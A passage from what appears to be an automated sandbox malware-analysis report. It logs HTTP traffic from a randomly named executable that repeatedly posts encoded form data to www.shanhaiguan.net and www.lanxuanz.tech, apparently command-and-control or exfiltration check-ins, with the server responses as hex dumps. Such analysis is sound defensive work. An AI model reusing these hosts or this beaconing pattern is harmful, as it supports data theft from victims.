                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Sep 26, 2024 15:19:56.893914938 CEST402INHTTP/1.1 200 OK
                                                        Server: openresty
                                                        Date: Thu, 26 Sep 2024 13:19:56 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 262
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 49 48 3d 42 50 33 50 72 4a 76 48 63 36 4d 58 63 46 26 77 72 52 4c 4c 50 55 68 3d 67 75 64 78 58 63 66 49 6a 66 4d 36 52 53 67 6a 6c 48 53 58 77 45 45 57 63 32 2b 7a 45 58 67 30 4b 4c 6d 42 57 61 4e 63 78 68 68 63 75 78 38 67 32 61 4e 73 2b 6b 71 4f 33 46 51 4d 44 56 6e 4c 6b 70 48 4d 73 75 67 59 47 51 77 49 6d 2b 67 7a 30 79 6a 75 62 74 32 6a 75 73 4e 4e 75 75 74 32 51 4c 78 32 69 61 66 63 59 71 64 72 78 63 50 4e 36 69 4a 4a 47 6b 73 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?IH=BP3PrJvHc6MXcF&wrRLLPUh=gudxXcfIjfM6RSgjlHSXwEEWc2+zEXg0KLmBWaNcxhhcux8g2aNs+kqO3FQMDVnLkpHMsugYGQwIm+gz0yjubt2jusNNuut2QLx2iafcYqdrxcPN6iJJGks="}</script></head></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        17192.168.2.449756156.242.132.82803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:20:02.596055031 CEST783OUTPOST /p2q3/ HTTP/1.1
                                                        Host: www.shanhaiguan.net
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.shanhaiguan.net
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 205
                                                        Referer: http://www.shanhaiguan.net/p2q3/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Data Raw: 77 72 52 4c 4c 50 55 68 3d 49 49 65 72 39 4b 71 63 55 43 74 63 6f 4f 63 6d 4b 66 4a 65 4f 64 2f 52 2f 70 6b 67 78 59 41 32 45 72 72 36 75 44 46 4a 57 2b 45 49 6c 51 73 52 38 4e 64 51 70 54 4b 59 44 53 7a 63 7a 65 50 6c 38 7a 48 42 65 71 64 30 69 2f 72 61 4c 47 30 74 34 48 59 75 64 79 6b 2b 38 6e 44 2f 34 4d 32 34 72 51 34 54 38 35 53 66 33 34 68 72 7a 54 75 4f 45 36 45 4d 4b 66 31 6b 63 4e 55 6c 63 78 4c 33 67 57 66 61 38 36 4f 72 50 43 66 46 67 37 6f 52 34 67 34 56 65 42 69 35 4d 53 37 4f 77 75 47 2b 48 79 35 48 34 34 7a 48 70 61 59 31 69 2b 6b 66 67 49 79 68 66 50 6b 63 4c 64 77 75 70 6e 52 4e 62 51 3d 3d
                                                        Data Ascii: wrRLLPUh=IIer9KqcUCtcoOcmKfJeOd/R/pkgxYA2Err6uDFJW+EIlQsR8NdQpTKYDSzczePl8zHBeqd0i/raLG0t4HYudyk+8nD/4M24rQ4T85Sf34hrzTuOE6EMKf1kcNUlcxL3gWfa86OrPCfFg7oR4g4VeBi5MS7OwuG+Hy5H44zHpaY1i+kfgIyhfPkcLdwupnRNbQ==


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        18192.168.2.449757156.242.132.82803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:20:05.139331102 CEST803OUTPOST /p2q3/ HTTP/1.1
                                                        Host: www.shanhaiguan.net
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.shanhaiguan.net
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 225
                                                        Referer: http://www.shanhaiguan.net/p2q3/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Data Raw: 77 72 52 4c 4c 50 55 68 3d 49 49 65 72 39 4b 71 63 55 43 74 63 70 76 73 6d 48 63 52 65 4c 39 2f 53 38 70 6b 67 71 6f 41 79 45 72 33 36 75 47 70 6e 57 73 77 49 6c 78 63 52 37 4a 70 51 75 54 4b 59 62 43 7a 56 73 4f 50 51 38 7a 4b 2b 65 71 78 30 69 2f 76 61 4c 44 51 74 37 30 77 74 53 43 6b 34 6c 33 44 68 6c 38 32 34 72 51 34 54 38 35 47 35 33 34 35 72 7a 44 65 4f 56 72 45 50 4a 66 31 72 62 4e 55 6c 59 78 4c 7a 67 57 66 6b 38 37 53 4e 50 45 44 46 67 35 67 52 37 30 55 53 56 42 69 7a 44 79 36 37 2b 75 6a 75 48 58 77 76 34 5a 4f 6b 6e 49 6f 74 71 59 31 46 78 35 54 32 4e 50 41 76 57 61 35 61 6b 6b 73 45 41 5a 38 64 37 64 4a 35 75 41 47 43 39 4e 2b 36 6e 6b 31 32 4c 57 63 3d
                                                        Data Ascii: wrRLLPUh=IIer9KqcUCtcpvsmHcReL9/S8pkgqoAyEr36uGpnWswIlxcR7JpQuTKYbCzVsOPQ8zK+eqx0i/vaLDQt70wtSCk4l3Dhl824rQ4T85G5345rzDeOVrEPJf1rbNUlYxLzgWfk87SNPEDFg5gR70USVBizDy67+ujuHXwv4ZOknIotqY1Fx5T2NPAvWa5akksEAZ8d7dJ5uAGC9N+6nk12LWc=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        19192.168.2.449758156.242.132.82803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:20:07.682749987 CEST10885OUTPOST /p2q3/ HTTP/1.1
                                                        Host: www.shanhaiguan.net
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.shanhaiguan.net
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 10305
                                                        Referer: http://www.shanhaiguan.net/p2q3/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Data Raw: 77 72 52 4c 4c 50 55 68 3d 49 49 65 72 39 4b 71 63 55 43 74 63 70 76 73 6d 48 63 52 65 4c 39 2f 53 38 70 6b 67 71 6f 41 79 45 72 33 36 75 47 70 6e 57 73 6f 49 6c 44 55 52 39 75 31 51 76 54 4b 59 46 53 7a 51 73 4f 50 33 38 7a 53 36 65 71 74 6b 69 38 48 61 61 56 63 74 2b 42 4d 74 4a 53 6b 34 34 6e 44 38 34 4d 32 58 72 51 6f 58 38 35 57 35 33 34 35 72 7a 46 61 4f 56 36 45 50 47 2f 31 6b 63 4e 56 6b 63 78 4c 50 67 57 57 66 38 37 6d 37 4d 33 62 46 75 35 51 52 72 58 73 53 63 42 69 39 50 53 36 6a 2b 75 65 30 48 58 45 4e 34 5a 72 4c 6e 4c 30 74 6f 73 55 76 6d 5a 6e 4c 62 63 6f 69 41 6f 74 75 6c 6c 55 32 5a 72 39 70 33 73 46 2b 32 78 47 5a 37 66 44 53 32 55 52 4d 51 69 72 48 75 45 6c 62 68 43 78 33 6b 4e 4d 75 63 66 2b 35 30 34 46 59 35 34 57 48 36 6e 78 44 5a 42 37 6b 4d 64 39 50 57 6e 58 6c 58 4b 36 33 62 65 6e 5a 70 49 63 51 64 79 63 57 64 71 35 38 37 46 6c 4a 49 49 44 31 53 78 50 56 71 36 79 70 30 74 70 42 74 36 67 2f 53 37 4a 57 7a 68 72 49 69 50 53 59 78 61 75 76 77 36 41 50 30 56 48 46 71 63 4b 4e 41 [TRUNCATED]
                                                        Data Ascii: wrRLLPUh=IIer9KqcUCtcpvsmHcReL9/S8pkgqoAyEr36uGpnWsoIlDUR9u1QvTKYFSzQsOP38zS6eqtki8HaaVct+BMtJSk44nD84M2XrQoX85W5345rzFaOV6EPG/1kcNVkcxLPgWWf87m7M3bFu5QRrXsScBi9PS6j+ue0HXEN4ZrLnL0tosUvmZnLbcoiAotullU2Zr9p3sF+2xGZ7fDS2URMQirHuElbhCx3kNMucf+504FY54WH6nxDZB7kMd9PWnXlXK63benZpIcQdycWdq587FlJIID1SxPVq6yp0tpBt6g/S7JWzhrIiPSYxauvw6AP0VHFqcKNAuEJhC8s7UiyNqii1in2H0SmpPHL9FFSl0zLa5zLFfyLJID2MC4gG+5j5IzGiYK79WV6x5ufpQUe4IOOkOY3bYoduACEe+4kWG5Ay+2zYyIpbGtYw5idcPDNpTwMxbmCmEQKMOtGwBN2gQ1pCpyamrN2BWWTp56qMe5zg68NvbS7UzMJfc2HJ5CuSsZE550AqRr2v0rOB7B3/U1Aw9xWbPcgfqmF2QbsT50f5atfqWYCy+i/om37bKt/FzLmAwfftGz3DF90tbAxYCdQ4EPKeUd8izajmj19+0I4y0RV2AO6fYe/QwKyK5L0FQk6i3HbQpK/f5xOd5Rg86o9ctxmEQW6GbIZiR6iDkUupUaF49cioTNx50qhs6ESCRjwjlfEHkbs+zGF/kzZ59W9Wy5NdWeFWhG+WqXttHDURp7Z4qszCiqCqookNPOEjdl2Cl1dPxnsrkG6F/O0YmZtzINVlJr1O680GRKt3xL7fXgge2A6O83Tlpe9ZPaFvamawprpSOr7KXNRTCVEKY8hAd5PbRANsOQLUePJgK45CKREymcHmVNCWiPjWZi8mUEgl2R4dUQLQSzIC2xfKIYBZ2uYfFnryPDmzlnvz8YxnF+F102dKvGveCF2Zh8bcN09G+w9e9RYi4Yv16ayrwzCKGUXQLNThMuTDP9sGaL [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        20192.168.2.449759156.242.132.82803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:20:10.845225096 CEST519OUTGET /p2q3/?wrRLLPUh=FK2L+8PIei1GuvtlS8gCO8fM4ZQmscEbBI34s0k1PsRmujAOjfMM4GbCZxnV6srYixPIeZB0oPqoKkF830AnIDgf70T/wPSZ3Q0Y3Iy42KJKjy26SpAoBvI=&IH=BP3PrJvHc6MXcF HTTP/1.1
                                                        Host: www.shanhaiguan.net
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        21192.168.2.449760136.143.186.12803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:20:37.681754112 CEST777OUTPOST /ivo1/ HTTP/1.1
                                                        Host: www.lanxuanz.tech
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.lanxuanz.tech
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 205
                                                        Referer: http://www.lanxuanz.tech/ivo1/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Data Raw: 77 72 52 4c 4c 50 55 68 3d 53 4a 54 6c 46 64 39 4f 6e 32 36 32 48 6e 2f 51 76 64 37 69 4a 4b 4f 47 55 6c 55 50 79 59 56 51 2b 6d 6e 64 35 30 64 34 37 36 43 70 38 32 36 51 45 6e 76 4c 6b 65 47 39 45 75 46 61 4e 67 69 75 39 47 61 62 37 43 44 50 6a 41 67 4b 74 53 7a 4c 58 6a 62 58 2b 34 39 39 57 54 70 49 67 58 2f 2f 5a 76 61 70 38 57 4f 49 6e 74 48 74 65 50 6a 4d 53 2b 74 2f 68 30 4c 64 32 42 31 31 38 73 4e 59 79 73 30 5a 48 4d 70 38 4b 57 43 5a 64 4d 2f 4f 69 4c 76 6e 33 57 39 72 34 39 56 41 46 73 6c 45 44 30 7a 42 4f 4a 30 38 2b 65 2b 4a 5a 65 48 65 61 36 36 66 4f 53 4b 58 6b 6c 75 4e 4a 35 32 69 4c 51 3d 3d
                                                        Data Ascii: wrRLLPUh=SJTlFd9On262Hn/Qvd7iJKOGUlUPyYVQ+mnd50d476Cp826QEnvLkeG9EuFaNgiu9Gab7CDPjAgKtSzLXjbX+499WTpIgX//Zvap8WOIntHtePjMS+t/h0Ld2B118sNYys0ZHMp8KWCZdM/OiLvn3W9r49VAFslED0zBOJ08+e+JZeHea66fOSKXkluNJ52iLQ==
                                                        Sep 26, 2024 15:20:38.295485973 CEST1236INHTTP/1.1 404
                                                        Server: ZGS
                                                        Date: Thu, 26 Sep 2024 13:20:38 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Set-Cookie: zalb_8ae64e9492=0f71d2b25c73f2883ce01c2fd3c97eb8; Path=/
                                                        Set-Cookie: csrfc=dce32280-3483-41eb-a527-b19dda18d3ec;path=/;priority=high
                                                        Set-Cookie: _zcsr_tmp=dce32280-3483-41eb-a527-b19dda18d3ec;path=/;SameSite=Strict;priority=high
                                                        Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                        vary: accept-encoding
                                                        Content-Encoding: gzip
                                                        Data Raw: 35 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 00 cd 58 5b 6f db 36 14 7e df af 60 15 b4 68 b1 28 92 25 2b 76 15 d9 c5 96 0c c5 9e 3a a0 03 86 0d 7b a1 25 ca 22 42 91 02 49 c7 4e 82 fd f7 1d 52 b2 ad 6b 93 f5 69 76 03 8b e2 b9 f1 7c df 39 24 9b bc b9 fb 72 fb fb 9f bf fd 82 0a 5d b2 f5 0f 49 fd 83 10 4a 0a 82 33 fb 64 06 25 d1 18 71 5c 92 95 23 c5 46 68 e5 a0 54 70 4d b8 5e 39 5c 50 9e 91 c3 25 e2 22 17 8c 89 bd 79 c2 32 2d e8 03 31 8f 8a d3 aa 22 da 41 de c9 9c a6 9a 91 f5 5f a2 10 89 57 3f 1f 67 18 e5 f7 48 3f 56 e0 48 93 83 f6 52 05 ae 24 61 2b 47 e9 47 46 54 41 8c a5 42 92 7c e5 78 7b b2 c9 21 0a f5 29 c7 25 65 8f ab 2f 15 e1 3f 7e c5 5c c5 73 df bf bc f6 7d e7 64 d7 6a 1f 47 f0 d9 88 ec f1 f9 3c 84 8f b1 e4 d6 86 62 c7 58 42 c6 92 73 89 14 fc b8 8a 48 9a df 0c 15 14 7d 22 f1 6c 56 1d ba 73 25 96 5b ca 63 1f de a3 ce 44 85 b3 8c f2 ed c8 cc 06 a7 f7 5b 29 76 3c 73 53 c1 84 8c 2f f2 c8 7c 5b 86 ff 39 3f 5e 69 51 dd 1a 31 f5 3c 61 25 46 6e 29 9e 5c 48 28 c1 d2 dd 4a 9c 51 80 eb 3d 23 b9 be 44 17 b9 3f [TRUNCATED]
                                                        Data Ascii: 56fX[o6~`h(%+v:{%"BINRkiv|9$r]IJ3d%q\#FhTpM^9\P%"y2-1"A_W?gH?VHR$a+GGFTAB|x{!)%e/?~\s}djG<bXBsH}"lVs%[cD[)v<sS/|[9?^iQ1<a%Fn)\H(JQ=#D?_Euu,Xyo?LSt7Ba6%?DvL1)R{7V</fKOsN{vPc}0@J0|-NeNt$E+Ca^uK0gE,0][`Zn~.^D %cT,#|K1{Q;,1oz&j5#ZIdZA@OXU0_Qcq&?!S
                                                        Sep 26, 2024 15:20:38.295891047 CEST723INData Raw: c4 9a 5a 58 38 05 97 29 f2 ef 81 e3 55 a0 be 94 ef ab 5a 00 f6 d9 e7 e9 9c c0 6c 7b 93 6b ab 67 c2 34 cd ba d3 f4 2c 34 dd c7 f4 f0 bb 68 4a df 6a 53 9e 8b 89 32 b1 09 9f 4f 97 da 49 1f 31 8a fa 36 da b0 5f 7f 03 32 c3 56 c0 ad 37 cd a8 02 6d 73
                                                        Data Ascii: ZX8)UZl{kg4,4hJjS2OI16_2V7msr$0Njq{}7Mpa [^Xw7)fGL6n0WE5<5-VI0F#)514csjq\GQ=uwOS{<,GrK


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        22192.168.2.449761136.143.186.12803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:20:40.229796886 CEST797OUTPOST /ivo1/ HTTP/1.1
                                                        Host: www.lanxuanz.tech
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.lanxuanz.tech
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 225
                                                        Referer: http://www.lanxuanz.tech/ivo1/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Data Raw: 77 72 52 4c 4c 50 55 68 3d 53 4a 54 6c 46 64 39 4f 6e 32 36 32 48 48 50 51 75 2b 6a 69 49 71 4f 46 62 46 55 50 70 6f 55 62 2b 6d 72 64 35 32 78 6f 38 4d 36 70 37 54 47 51 57 6d 76 4c 6a 65 47 39 4f 4f 46 56 4a 67 69 78 39 47 57 39 37 44 2f 50 6a 41 30 4b 74 54 44 4c 57 55 48 55 2f 6f 39 37 5a 7a 6f 4f 75 33 2f 2f 5a 76 61 70 38 57 61 6d 6e 74 66 74 65 2b 54 4d 53 62 5a 38 73 55 4c 43 68 78 31 31 72 38 4e 55 79 73 31 36 48 4f 4d 52 4b 55 36 5a 64 4f 33 4f 6a 65 44 6b 35 57 39 58 30 74 55 43 4c 63 39 50 61 68 65 7a 44 72 77 44 30 2b 71 79 59 59 57 45 4c 4c 62 49 63 53 75 6b 35 69 6e 35 45 36 4c 72 51 54 64 32 47 77 59 4a 33 51 53 42 38 50 57 32 46 54 61 37 43 6d 59 3d
                                                        Data Ascii: wrRLLPUh=SJTlFd9On262HHPQu+jiIqOFbFUPpoUb+mrd52xo8M6p7TGQWmvLjeG9OOFVJgix9GW97D/PjA0KtTDLWUHU/o97ZzoOu3//Zvap8Wamntfte+TMSbZ8sULChx11r8NUys16HOMRKU6ZdO3OjeDk5W9X0tUCLc9PahezDrwD0+qyYYWELLbIcSuk5in5E6LrQTd2GwYJ3QSB8PW2FTa7CmY=
                                                        Sep 26, 2024 15:20:40.838776112 CEST1236INHTTP/1.1 404
                                                        Server: ZGS
                                                        Date: Thu, 26 Sep 2024 13:20:40 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Set-Cookie: zalb_8ae64e9492=aa11b5b9d2a4fd36a1a24567047ff52b; Path=/
                                                        Set-Cookie: csrfc=2864d344-b6b5-4e61-a71c-980b5089649f;path=/;priority=high
                                                        Set-Cookie: _zcsr_tmp=2864d344-b6b5-4e61-a71c-980b5089649f;path=/;SameSite=Strict;priority=high
                                                        Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                        vary: accept-encoding
                                                        Content-Encoding: gzip
                                                        Data Raw: 35 36 66 0d 0a 1f 8b 08 00 00 00 00 00 00 00 cd 58 5b 6f db 36 14 7e df af 60 15 b4 68 b1 28 92 25 2b 76 15 d9 c5 96 0c c5 9e 3a a0 03 86 0d 7b a1 25 ca 22 42 91 02 49 c7 4e 82 fd f7 1d 52 b2 ad 6b 93 f5 69 76 03 8b e2 b9 f1 7c df 39 24 9b bc b9 fb 72 fb fb 9f bf fd 82 0a 5d b2 f5 0f 49 fd 83 10 4a 0a 82 33 fb 64 06 25 d1 18 71 5c 92 95 23 c5 46 68 e5 a0 54 70 4d b8 5e 39 5c 50 9e 91 c3 25 e2 22 17 8c 89 bd 79 c2 32 2d e8 03 31 8f 8a d3 aa 22 da 41 de c9 9c a6 9a 91 f5 5f a2 10 89 57 3f 1f 67 18 e5 f7 48 3f 56 e0 48 93 83 f6 52 05 ae 24 61 2b 47 e9 47 46 54 41 8c a5 42 92 7c e5 78 7b b2 c9 21 0a f5 29 c7 25 65 8f ab 2f 15 e1 3f 7e c5 5c c5 73 df bf bc f6 7d e7 64 d7 6a 1f 47 f0 d9 88 ec f1 f9 3c 84 8f b1 e4 d6 86 62 c7 58 42 c6 92 73 89 14 fc b8 8a 48 9a df 0c 15 14 7d 22 f1 6c 56 1d ba 73 25 96 5b ca 63 1f de a3 ce 44 85 b3 8c f2 ed c8 cc 06 a7 f7 5b 29 76 3c 73 53 c1 84 8c 2f f2 c8 7c 5b 86 ff 39 3f 5e 69 51 dd 1a 31 f5 3c 61 25 46 6e 29 9e 5c 48 28 c1 d2 dd 4a 9c 51 80 eb 3d 23 b9 be 44 17 b9 3f [TRUNCATED]
                                                        Data Ascii: 56fX[o6~`h(%+v:{%"BINRkiv|9$r]IJ3d%q\#FhTpM^9\P%"y2-1"A_W?gH?VHR$a+GGFTAB|x{!)%e/?~\s}djG<bXBsH}"lVs%[cD[)v<sS/|[9?^iQ1<a%Fn)\H(JQ=#D?_Euu,Xyo?LSt7Ba6%?DvL1)R{7V</fKOsN{vPc}0@J0|-NeNt$E+Ca^uK0gE,0][`Zn~.^D %cT,#|K1{Q;,1oz&j5#ZIdZA@OXU0_Qcq&?!S
                                                        Sep 26, 2024 15:20:40.838897943 CEST718INData Raw: c4 9a 5a 58 38 05 97 29 f2 ef 81 e3 55 a0 be 94 ef ab 5a 00 f6 d9 e7 e9 9c c0 6c 7b 93 6b ab 67 c2 34 cd ba d3 f4 2c 34 dd c7 f4 f0 bb 68 4a df 6a 53 9e 8b 89 32 b1 09 9f 4f 97 da 49 1f 31 8a fa 36 da b0 5f 7f 03 32 c3 56 c0 ad 37 cd a8 02 6d 73
                                                        Data Ascii: ZX8)UZl{kg4,4hJjS2OI16_2V7msr$0Njq{}7Mpa [^Xw7)fGL6n0WE5<5-VI0F#)514csjq\GQ=uwOS{<,GrK
                                                        Sep 26, 2024 15:20:40.838908911 CEST5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        23192.168.2.449762136.143.186.12803844C:\Program Files (x86)\qafORxbsSGVYqNmVVQiecSGKhxKZNSelXYGsxxAnhxKivYVd\tStjsTMXwkdtbv.exe
                                                        TimestampBytes transferredDirectionData
                                                        Sep 26, 2024 15:20:42.775813103 CEST10879OUTPOST /ivo1/ HTTP/1.1
                                                        Host: www.lanxuanz.tech
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                        Accept-Language: en-us
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.lanxuanz.tech
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Length: 10305
                                                        Referer: http://www.lanxuanz.tech/ivo1/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                                        Data Raw: 77 72 52 4c 4c 50 55 68 3d 53 4a 54 6c 46 64 39 4f 6e 32 36 32 48 48 50 51 75 2b 6a 69 49 71 4f 46 62 46 55 50 70 6f 55 62 2b 6d 72 64 35 32 78 6f 38 4d 79 70 37 68 2b 51 56 46 48 4c 69 65 47 39 51 65 45 53 4a 67 69 38 39 43 36 35 37 44 7a 35 6a 43 4d 4b 73 78 4c 4c 66 41 7a 55 30 6f 39 37 42 44 70 4a 67 58 2b 33 5a 72 47 74 38 57 4b 6d 6e 74 66 74 65 38 4c 4d 55 4f 74 38 75 55 4c 64 32 42 31 35 38 73 4d 39 79 73 74 45 48 4f 5a 73 4a 6b 61 5a 64 75 6e 4f 6c 73 62 6b 78 57 39 52 31 64 55 67 4c 63 41 58 61 6c 2f 4b 44 71 55 70 30 38 32 79 61 65 58 6e 62 62 50 4a 4b 69 2f 36 76 41 72 38 42 49 58 5a 57 55 56 53 42 46 59 39 6d 6b 69 33 36 75 48 79 58 51 37 38 55 51 61 55 35 52 78 5a 4f 72 6a 67 63 58 30 57 6a 4f 70 7a 34 57 33 56 6b 54 41 55 66 61 51 77 5a 43 69 69 41 55 64 66 74 64 6c 37 4f 39 33 79 70 33 77 41 36 4c 51 6b 49 54 69 75 72 75 74 63 4c 67 56 6a 69 4d 61 6d 6f 69 2b 6e 32 43 7a 4d 65 32 38 55 67 38 77 32 62 62 4a 55 43 51 2f 5a 59 69 58 76 72 73 5a 72 57 32 44 4a 34 68 77 66 37 71 74 6b 64 [TRUNCATED]
                                                        Data Ascii: wrRLLPUh=SJTlFd9On262HHPQu+jiIqOFbFUPpoUb+mrd52xo8Myp7h+QVFHLieG9QeESJgi89C657Dz5jCMKsxLLfAzU0o97BDpJgX+3ZrGt8WKmntfte8LMUOt8uULd2B158sM9ystEHOZsJkaZdunOlsbkxW9R1dUgLcAXal/KDqUp082yaeXnbbPJKi/6vAr8BIXZWUVSBFY9mki36uHyXQ78UQaU5RxZOrjgcX0WjOpz4W3VkTAUfaQwZCiiAUdftdl7O93yp3wA6LQkITiurutcLgVjiMamoi+n2CzMe28Ug8w2bbJUCQ/ZYiXvrsZrW2DJ4hwf7qtkdyv1VjvrZN/0f7A2Iz5RC43HsbZzw1VTMUIdM7w5QrhG7fJc1pQ004c7sIyERCIL6FoiNXknrco+LxjK4Ib+DBA6MmZUOk6saxKfSNGH6JnIFRraEjeJNbZxLdYYsxlaREPcgNvj+RgjDkznt0985gJyhQ6ltmnAV3XCFiUU97XoxE61Q8lGphvqyQxYILaUDYIQOYrRx4fDZNy5y/LecaoIv+i9BqD35hCGwisG6vQbExNtc4HRBFvfAvvP6q+wKtzTYza8WqI9ppOP0jCz1MxhC15vzcxEkePBEia8T79+NdDjxoSdIFj/lNZmAdBuPGCZZE/a/w4TnnW4SYDEIM0y1OZOppKHB36/1T8WSJIsvFjGGy96mn2szqyp6NJOkZKWV/nXv8Ej05a1JmTQWg1+2EEoPGA4s44PtyA3sCJWLiUE0gNslX1VLWPUD2AaoQl+HrJCquGnaTaNIGDYLEDUC6Q9y9T1kkXsU44Ux0gNLpdpi0bjJKmnsTftdizKtYfZFx3GWnlogRlpP63dMnkz3FscYAelkbPUv2enNKOzB8JhGEHY6SDQS1BVWwPAB28kWvCKoWImlZQnjKyMOsSgujRKR1weELnBOANVz/QgJZLU8gWjSsMiNiA3sn6dF9kGO461+7Hkd4/wvs7Y+